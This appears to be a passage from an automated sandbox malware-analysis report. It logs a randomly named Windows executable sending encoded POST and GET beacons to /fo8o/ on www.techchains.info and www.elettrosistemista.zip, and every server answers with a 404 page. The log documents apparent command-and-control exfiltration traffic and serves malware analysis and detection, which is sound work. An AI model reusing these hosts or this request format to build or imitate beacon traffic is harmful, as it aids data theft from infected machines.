                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.45001666.29.149.46803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:00.007350922 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.techchains.info
                                                                              Origin: http://www.techchains.info
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.techchains.info/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                                                              Data Ascii: SHqP-p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
                                                                              Nov 21, 2024 12:56:01.298811913 CET637INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:01 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.45001766.29.149.46803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:02.656513929 CET10882OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.techchains.info
                                                                              Origin: http://www.techchains.info
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.techchains.info/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 50 77 [TRUNCATED]
                                                                              Data Ascii: SHqP-p=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8FxwN1gFMyxBM/tNPbBkWWg65rW9OhS47R+Iv/tlYxFS0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vMbwnt4DQqh8cNgsgk228k2L5PngYyoOdflnFrW7M3LcFPsxhRf+//D4dcTwaOVLhv3eCUZqpusHwyXPwgW6TuK70JeCi9ELbm/JHs5nEZNYt9gINRz/xk4saE+gyfNPVd3USkEHFWiwgLoCdyxMiCnCV8N7vp9jvHuYVFECizejIFUsj1L5awlRSArxkosu88jFosLjjCV7rQpRN0ORDusbVE2SNfVKz2OyNaNQdvD2CWu0KTn2b3qsWvBXgwId92/TbSN8occRSpiyYr1jezk5xorkS1szuFZ/RymGtg/8QkAbBDTGyV4RefsT9vhapIKaqQEEOoeKY/5ZP269UFz+h5ide/dT34BdS9mqqT2UIUly3+AMrUEY30rOFIix6vdECEKy5LB2rpiNOOSVaiXWCgixsCCORrIiVOr3P5e3OV9DPwPyAsbm89NL/G5GEi+zK+YkrbbMcdFfMu1NNykUJeOn8j6mvaCZ8viIlMthIq3jRhpa4WGktmqI9JGAiWfe3RTFf5UoLc/LRdG7NWrwQEHYRtULAb2RmPTJSIhRo3JF+TqzjwKDv6E6/m4JXZju0iG5ZlM4iBaYQ6BAN6HSGPTPiBOfNYSnFlpqkN5mTxHH3dRegdjc9HfvbUxICgg/Zv6i5Vjk5NQIjfwdN4cUtFDB6sbzMnctvq74A7LnkLpf6PVYILwp0uRFKRNJXdXxCqQHmxVOcJAofjqgMSHN/cmP/q8HxjOm4JN1IK4EIjTWHxU [TRUNCATED]
                                                                              Nov 21, 2024 12:56:04.057415962 CET637INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:03 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.45001866.29.149.46803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:05.312531948 CET508OUTGET /fo8o/?SHqP-p=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&0xilO=7vZpwBG HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Host: www.techchains.info
                                                                              Connection: close
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Nov 21, 2024 12:56:06.621342897 CET652INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:06 GMT
                                                                              Server: Apache
                                                                              Content-Length: 493
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.450019195.110.124.133803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:12.102693081 CET798OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.elettrosistemista.zip
                                                                              Origin: http://www.elettrosistemista.zip
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 203
                                                                              Referer: http://www.elettrosistemista.zip/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                                                              Data Ascii: SHqP-p=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
                                                                              Nov 21, 2024 12:56:13.514568090 CET367INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:13 GMT
                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.450020195.110.124.133803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:14.750911951 CET818OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.elettrosistemista.zip
                                                                              Origin: http://www.elettrosistemista.zip
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 223
                                                                              Referer: http://www.elettrosistemista.zip/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d
                                                                              Data Ascii: SHqP-p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
                                                                              Nov 21, 2024 12:56:16.110126972 CET367INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:15 GMT
                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.450021195.110.124.133803752C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Nov 21, 2024 12:56:17.412246943 CET10900OUTPOST /fo8o/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                              Accept-Language: en-US,en
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Host: www.elettrosistemista.zip
                                                                              Origin: http://www.elettrosistemista.zip
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Content-Length: 10303
                                                                              Referer: http://www.elettrosistemista.zip/fo8o/
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                              Data Raw: 53 48 71 50 2d 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 50 6f 6d 4c 43 66 2f 74 36 30 52 55 6f 71 73 39 59 75 51 4b 61 34 6f 35 70 72 44 76 4d 48 39 53 62 53 68 6a 65 48 2b 32 33 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 47 4c 61 4b 4e 65 70 57 45 41 32 2b 42 2b 44 43 52 31 73 43 35 72 75 62 64 54 48 39 48 45 6d 53 68 4b 67 37 75 52 70 75 59 43 72 6e 69 79 5a 4f 78 78 2b 66 77 38 68 64 6d 30 68 56 58 6f 4e 6d 78 71 49 59 47 2f 69 31 5a 34 2b 48 2f 6a 75 4d [TRUNCATED]
                                                                              Data Ascii: SHqP-p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWPomLCf/t60RUoqs9YuQKa4o5prDvMH9SbShjeH+23Z5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqGLaKNepWEA2+B+DCR1sC5rubdTH9HEmShKg7uRpuYCrniyZOxx+fw8hdm0hVXoNmxqIYG/i1Z4+H/juMFpdnN89VHxi9Jaw2sh9CJtt+C8Sr1Z+wRy6TYReB5ys/dgCKdsxeFltjZCAFlR5VrM/1wLjkKF7adGqPCLL0d6uoU+eDO0hvKYenTQgmZYHEe7+UHsu7TbsYxpgNn4i4AD48jePo5nIOTt5WZ8qQEK9l6v8jw+L3ZPIkNmIKTn8l0QHC66zVtxqxlwhPsJONRF5FAwRxuYLLuQ1AOQBB41G1JstARWEryL4EWLo8zBHXMNllACaAZFn5DU9b+ORBkDKjbAun2+jQdpx3k59oRagJTgQRC42PnmyV724DU3eHzPcw3jHkhDTBMUu50+QeZwRo8k7ZmO+LkzJBi9hX2cfvkbkEZd4sgtXZmtGbW7zV0o2kw2jakmpjgYjUGXpPQpEVV2MLERunr2S6kdI28PkpXxDFDpxI2ot5wnZD1uv/gRMCUeLXN8foAD2fi2+6XdpFXTlAb08OkXYVy3T2zFUJqP/ic/54OhEflwYIgGCNHa0xouhuieOTsEX53hl7k6RUj+gkXp5Cu3+MpVQV3aqO1ZUp9WF1xfNy1ZqrPB2m6U9YSJR1cNzgRyM7Vo3xo3OeObcpYXhPl0lUg0qc5YNT73BhEKXxkc/wP7N6sojl/DTcsdpZgnfc1gQI2iGwx8sfZCGdjOVKcvA0Br8ZGbFgYA1ebCJMSF [TRUNCATED]
                                                                              Nov 21, 2024 12:56:18.871484041 CET367INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 21 Nov 2024 11:56:18 GMT
                                                                              Server: Apache
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
